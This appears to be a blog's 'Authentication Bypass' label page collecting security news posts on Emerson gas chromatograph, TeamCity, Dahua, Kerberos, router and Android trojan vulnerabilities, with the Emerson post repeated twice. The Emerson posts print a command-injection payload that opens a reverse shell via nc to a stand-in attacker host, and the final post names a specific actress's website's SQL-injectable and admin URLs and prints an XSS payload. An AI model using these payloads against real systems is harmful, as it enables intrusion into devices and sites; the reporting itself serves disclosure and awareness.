Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Authentication Bypass. Show all posts

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command implementation. This flaw is tied to a system function that calls a constructed shell command with a user-provided file name without proper sanitization, allowing an attacker to inject arbitrary shell commands.

An attacker could exploit this by supplying crafted input such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.

Critical Vulnerabilities Found in Emerson Gas Chromographs Expose Systems

 

Multiple critical vulnerabilities have been identified in Emerson gas chromatographs, posing risks such as unauthorized access to sensitive data, denial-of-service conditions, and arbitrary command execution. Gas chromatographs are essential in various industries like chemical, environmental, and healthcare sectors for analyzing and separating chemical compounds. The Emerson Rosemount 370XA, a widely used model, uses a proprietary protocol for communication between the device and a technician's computer.

Security researchers from Claroty's Team82 discovered four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a critical CVSS v3 score of 9.8.

The vulnerability, designated CVE-2023-46687, is an unauthenticated remote code execution or command injection flaw found in the "forced calibration" command type. It involves a system function that uses a constructed shell command with a user-provided file name without proper sanitization, allowing attackers to inject arbitrary shell commands.

Attackers can exploit this vulnerability by supplying crafted inputs, such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file, leading to arbitrary code execution in the root shell context.

Another vulnerability, CVE-2023-51761, is an authentication bypass that allows attackers to reset the administrator password by calculating a secret passphrase derived from the device's MAC address. Since the MAC address is not secret and can be easily obtained, attackers can generate the passphrase and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

The vulnerability CVE-2023-49716 involves a user login bypass through a password reset mechanism, enabling an unauthenticated user with network access to gain admin capabilities by bypassing authentication.

The final vulnerability, CVE-2023-43609, involves command injection via reboot functionality, allowing an authenticated user with network access to execute arbitrary commands remotely.

Due to the high cost and difficulty of obtaining a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They identified flaws in the device's protocol implementation, enabling them to craft payloads and uncover the vulnerabilities. For instance, the authentication bypass vulnerability allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

Emerson has issued a security advisory recommending that end users update the firmware on their products. The Cybersecurity and Infrastructure Security Agency has also released an advisory regarding these vulnerabilities.

TeamCity Software Vulnerability Exploited Globally

 


Over the past few days a security breach has transpired, hackers are taking advantage of a significant flaw in TeamCity On-Premises software, allowing them to create unauthorised admin accounts. This flaw, known as CVE-2024-27198, has prompted urgent action from software developer JetBrains, who released an update on March 4 to address the issue.

The gravity of this situation is evident as hackers exploit the vulnerability on an extensive scale, creating hundreds of unauthorised users on instances of TeamCity that have not yet received the essential update. According to LeakIX, a platform specialising in identifying exposed device vulnerabilities, over 1,700 TeamCity servers remain unprotected. Most notably, vulnerable hosts are predominantly found in Germany, the United States, and Russia, with an alarming 1,440 instances already compromised.

On March 5, GreyNoise, a company analysing internet scanning traffic, detected a notable surge in attempts to exploit CVE-2024-27198. The majority of these attempts originated from systems in the United States, particularly those utilising the DigitalOcean hosting infrastructure.

These compromised TeamCity servers are not mere inconveniences; they serve as vital production machines used for building and deploying software. This presents a significant risk of supply-chain attacks, as the compromised servers may contain sensitive information, including crucial credentials for environments where code is deployed, published, or stored.

Rapid7, a prominent cybersecurity company, brought attention to the severity of the situation. The vulnerability, with a critical severity score of 9.8 out of 10, affects all releases up to TeamCity version 2023.11.4. Its nature allows remote, unauthenticated attackers to gain control of a vulnerable server with administrative privileges.

JetBrains responded swiftly to the report by releasing TeamCity version 2023.11.4 on March 4, featuring a fix for CVE-2024-27198. They are urging all TeamCity users to update their instances to the latest version immediately to mitigate the risks associated with this critical vulnerability.

Considering the observed widespread exploitation, administrators of on-premise TeamCity instances are strongly advised to take immediate action in installing the newest release. Failing to do so could leave systems vulnerable to unauthorised access and potential supply-chain attacks, amplifying the urgency of this situation.

The recent discovery of a critical flaw in TeamCity software has far-reaching implications for the global security landscape. Users are urged to act promptly by updating their TeamCity instances to ensure protection against unauthorised access and the looming threat of potential supply-chain attacks. The urgency of this matter cannot be overstated, accentuating the imperative need for immediate action.



New Chameleon Android Trojan Can Bypass Biometric Security

 

A brand new variant of the Chameleon Android malware has been discovered in the wild, featuring new characteristics, the most notable of which is the ability to bypass fingerprint locks.

The Chameleon Android banking malware first appeared in early 2023, primarily targeting mobile banking apps in Australia and Poland, but it has since propagated to other countries, including the UK and Italy. The trojan employs multiple loggers but has limited functionality. 

Earlier versions of Chameleon could perform actions on the victim's behalf, allowing those behind the malware to carry out account and device takeover attacks. Chameleon has usually leveraged the Android Accessibility Service to extract sensitive data from endpoints and mount overlay attacks, ThreatFabric researchers explained.

The updated version, on the other hand, has two new features: the ability to circumvent biometric prompts and the ability to display an HTML page to allow accessibility service in devices that use Android 13's "Restricted Settings" feature. According to the researchers, the new Chameleon variant's complexity and adaptability have been enhanced, making it a more potent threat in the constantly evolving field of mobile banking trojans. 

The new Chameleon variation starts by determining whether the operating system is Android 13 or newer. If it is, the malware prompts the user to enable accessibility services, even guiding the user through the procedure.Once completed, the malware is able to perform unauthorised acts on the user's behalf. 

While this is a common feature across malware families, what makes this particular aspect intriguing is the ability to disrupt the targeted device's biometric processes and get around fingerprint locks.

The method uses the AccessibilityEvent system-level event for Android and the KeyguardManager application programming interface to determine the screen and keyguard state based on UI changes. Keyguard is an Android system component that controls security features on devices, including screen lock and authentication mechanisms. 

The malware assesses the state of the keyguard in terms of various locking techniques, such as pattern, PIN, or password. When specific requirements are met, the malware will use the AccessibilityEvent action to switch from biometric to PIN authentication. This gets around the biometric question, allowing the trojan to unlock the device whenever it wants. 

The method is believed to offer those behind the malware with two advantages: the ability to simplify the theft of PINs, passwords, or graphical keys by bypassing biometric data via keylogging functionalities, and the ability to open devices using previously acquired PINs or passwords.

“The emergence of the new Chameleon banking trojan is another example of the sophisticated and adaptive threat landscape within the Android ecosystem,” the researchers concluded. “Evolving from its earlier iteration, this variant demonstrates increased resilience and advanced new features.”

Unpatched Dahua Cameras are Prone to Authentication Bypass Vulnerabilities

 

Two authentication bypass vulnerabilities exist in unpatched Dahua cameras, and a proof-of-concept exploit released on 7th October makes the case for upgrading urgent. Both CVE-2021-33044 and CVE-2021-33045 are authentication bypass weaknesses that can be remotely exploited during the login process by sending specially crafted data packets to the target device. 

This comes a month after Dahua issued a security advisory urging owners of vulnerable models to update their firmware, but given how often these devices are forgotten after initial setup and installation, it's possible that many of them are still running an old and vulnerable version. The list of impacted models is long and includes several Dahua cameras, including some thermal cameras. 

IPVM confirmed in 2019 that numerous Dahua cameras had a wiretapping vulnerability, based on tests and information from Dahua. Even if the camera's audio was turned off, an unauthenticated attacker could still listen in. 

An emergency investigation was conducted by the Dahua Security Team and the R&D Team, with the following preliminary findings: 

 • Unauthorized download vulnerability in video chat - This vulnerability no longer exists after code reworking because the relevant functional modules were refactored. Some EOL products would have posed a threat to security.

 • Replay attack vulnerability: This was a newly discovered vulnerability that had affected several Dahua products. 

Dahua spokesperson Tim Shen said, "Dahua uses the secure login authentication method “Digest” by default, but in order to be compatible with early devices, we also retain support for the login authentication method with insufficient security. This vulnerability just exploits these insecure login authentication methods." 

The flaw was initially reported to Dahua in May of 2019. Tenable Research Engineer Jacob Baines discovered a vulnerability within an Amcrest (Dahua OEM) camera's firmware (PoC here, CVE-2019-3948), allowing unauthenticated access to the audio stream. 

The Chinese surveillance camera provider Dahua Technology has been barred from doing business and selling products in the United States since October 2019, when it was added to the US Department of Commerce's 'Entity List.' However, tens of thousands of Dahua cameras are still in use around the country, and some of them may not be readily apparent. Many cameras marketed in the United States under American or Canadian brands use Dahua hardware and even software, according to a new revelation from The Intercept.

Kerberos Authentication Spoofing: A Quick Look

 

Since authentication is the first line of defence for security systems, if a threat actor gets past it, they can very much do whatever they want. Threat actors can log in as administrators and change configurations, get access to protected resources, and take control of appliances in order to steal sensitive data. 

Silverfort discovered that all four security systems they examined – Cisco ASA, F5 Big-IP, IBM QRadar, and Palo Alto Networks PAN-OS – were vulnerable to bypass vulnerabilities due to the way they implemented the Kerberos and LDAP authentication protocols. 

Kerberos was first introduced by Microsoft in Windows 2000. It's also become the industry standard for websites and Single-Sign-On implementations on a variety of platforms. Kerberos is an open-source project maintained by the Kerberos Consortium. Microsoft Windows presently uses Kerberos authentication as its default authorization method, and Kerberos implementations are available for Apple OS, FreeBSD, UNIX, and Linux. 

The Kerberos authentication protocol works in the following ways:

 • The client asks the Key Distribution Center (KDC) for an authentication ticket (TGT). 

 • The KDC checks the credentials and returns an encrypted TGT as well as the session key.

 • The Ticket Granting Service (TGS) secret key is used to encrypt the TGT. 

 • When the TGT expires, the client keeps it, and the local session manager requests another TGT (this process is transparent to the user).

Kerberos can be configured without Kerberos' SSO capabilities in the four security systems aforementioned. Instead, when logging in, the user is asked for a username and password, and the system then asks for the TGT. To put it another way, the security system acts as both a client and a server. A KDC spoofing vulnerability might occur if the Client/Server exchange is overlooked. 

The KDC Spoofing vulnerability allows an attacker to overcome Kerberos authentication, break security restrictions, and obtain unrestricted access to sensitive workloads using Big-IP Access Policy Manager (APM). In a report, Silverfort security researchers Yaron Kassner and Rotem Zach discussed it. 

F5 Networks released BIG-IP APM versions 12.1.6, 13.1.4, 14.1.4, and 15.1.3, which included a security patch for this vulnerability (CVE-2021-23008, CVSS score 8.1). Multi-factor authentication (MFA) or an IPSec tunnel between the impacted BIG-IP APM system and the Active Directory servers, was suggested by the company. 

12-Year-Old Authentication Bypass Vulnerability Could Allow Network Compromise

 

At least 20 router models have been found to have a 12-year-old authentication bypass vulnerability that might allow attackers to hijack networks and devices, possibly affecting millions of users. The critical path traversal bug was discovered by Evan Grant of Tenable and is tracked as CVE-2021–20090 with a CVSS of 9.8. It can be exploited by unauthenticated, remote attackers. Grant discovered the problem in Buffalo routers, notably the Arcadyan-based web interface software.

Grant discovered that bypass check() only checked as many bytes as there were in the bypass_list strings. Grant was able to circumvent authentication by exploiting this flaw, letting unauthenticated users view pages they shouldn't be able to. Two more vulnerabilities, CVE-2021-20091 and CVE-2021-20092, were discovered, however, they only target specific Buffalo routers at this time. 

According to Grant, this latest revelation raises concerns about the danger of supply chain attacks, which are becoming a more common and serious threat to businesses and technology users. “There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors,” Grant wrote. "Consequently, we were surprised they hadn’t been discovered and fixed by the manufacturer or vendors who are selling affected devices over the past decade." 

On Friday, just three days following the bug's disclosure, Juniper Networks cybersecurity researchers announced that they had detected active exploitation of the bug. “We have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,” they wrote in a post. “The attacker seems to be attempting to deploy a Mirai variant on the affected routers.”

Mirai is a long-running botnet that can be used to launch distributed denial-of-service (DDoS) attacks by infecting linked devices. It first appeared in 2016, when it overloaded Dyn web hosting servers, bringing down over 1,200 websites, including Netflix and Twitter. Its source code was disclosed later that year, prompting the emergence of additional Mirai versions. 

According to Juniper, several of the scripts used in the latest wave of assaults are similar to those used in prior attacks in February and March. “The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,” researchers wrote.

Bollywood Actress Divya Dutta website vulnerable to critical vulnerabilities


Ravi Kariya, a Security Analyst from Cyber Octet Pvt. Ltd (facebook.com/cyberoctet) has discovered critical vulnerabilities in the official website (divyadutta.co.in) of famous Indian Actress Divya Dutta.

There are two SQL Injection vulnerability in the website.  One of the vulnerabilities resides in the  Press Clips page of the site(divyadutta.co.in/pressclipdetail.asp?id=7).  A malicious hacker can exploit this vulnerability and extract the database .

The other one is more critical one , it allows hackers to bypass authentication of the Login .  A malicious hacker can login into the website as admin(divyadutta.co.in/admin/) . This can be done by injecting the crafted password that will modify the sql query such that it allows hacker to login.

There is also Cross site scripting vulnerability in the contact us page(divyadutta.co.in/contact.asp ) .  Injecting the follow code in the fields and clicking the submit button executes the injected code:

"><script>alert('My Love For Divya Dutta')</script>




Ravi tried to contact the Divya dutta via email and Twitter but she fails to respond for his query.  It seems like that She doesn't realize the severity level of this security flaw. A BlackHat hacker is able to deface the site with these vulnerabilities.

I think she will respond after some blackhats attack the site, what do you think guys?

*Update*
After E hacking news published news about the vulnerability, the admin pulled down the divya dutta site. Now the site displays the following error message:

"Directory Listing Denied.This Virtual Directory does not allow contents to be listed."